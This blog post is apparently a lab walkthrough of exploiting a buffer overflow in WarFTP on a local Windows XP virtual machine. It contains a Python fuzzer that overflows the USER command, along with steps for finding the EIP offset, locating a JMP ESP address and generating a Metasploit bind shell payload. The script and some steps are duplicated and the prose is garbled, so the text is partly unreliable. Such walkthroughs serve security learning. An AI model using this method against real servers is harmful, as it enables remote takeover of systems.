Exploit WarFTP Using Fuzzing
open warftp
Before making a simple fuzzer used to send data in potocol FTP. Scribt as below
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then xfuzz.py name for that file. then open WarFTP in my Windows XP in Virtual Box and Run from WarFTP. Then the status will WarFTP IDLE. Then, try to connect using ftp from Backtrack to NC. typing the command nc 192.168.56.101 21.
then start xfuzz.py file that was created earlier to see which will happen by using the command python Warftp xfuzz.py then WarFtp will CRASH. WarFTP and when opened will display a message like this
process where we add new userr
how EIP
command in bt /pentest/exploits/framework/tools/ by using command cd /pentest/exploits/framework/tools/ .
after the command ./pattern_create.rb 1000 > string_pattern.txt
Then the data in string_pattern.txt
after the cmmand kwrite string_pattern.txt
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then xfuzz.py name for that file. then open WarFTP in my Windows XP in Virtual Box and Run from WarFTP. Then the status will WarFTP IDLE. Then, try to connect using ftp from Backtrack to NC. typing the command nc 192.168.56.101 21.
process where we add new userr
how EIP
command in bt /pentest/exploits/framework/tools/ by using command cd /pentest/exploits/framework/tools/ .
after the command ./pattern_create.rb 1000 > string_pattern.txt
Then the data in string_pattern.txt
after the cmmand kwrite string_pattern.txt
then the display will exit kwrite
then you have to copy files on string_pattern.txt
running in ollydbg
Paterern offset
pentest/exploits/framework/tools/ in console bt. and command ./pattern_offset.rb 71413171 and then ./pattern_offset.rb Aq4Aq5A
input in xfuzz.py
trying in olyydbg and the result is:
user32.dll and shell32.dll.
click double in file shell32
input comand JMP ESP
a new scribt
running in OllyDBG
get payload metasploit GUI
open browser and input http://127.0.0.1:55555
menu payload and windows 32
and choise windows bind shell
A generate
a new scribt fuzzing run the process the previous step
then run the command again ordered a fuzzing as the previous run, and the results areshown in the picture below
after the picture looks bleak at the top of our lives run telnet command as belo
after telnet then there will be a process for a while we wait for some time and the results areas shown in the picture below
Categories:
0 comments:
Post a Comment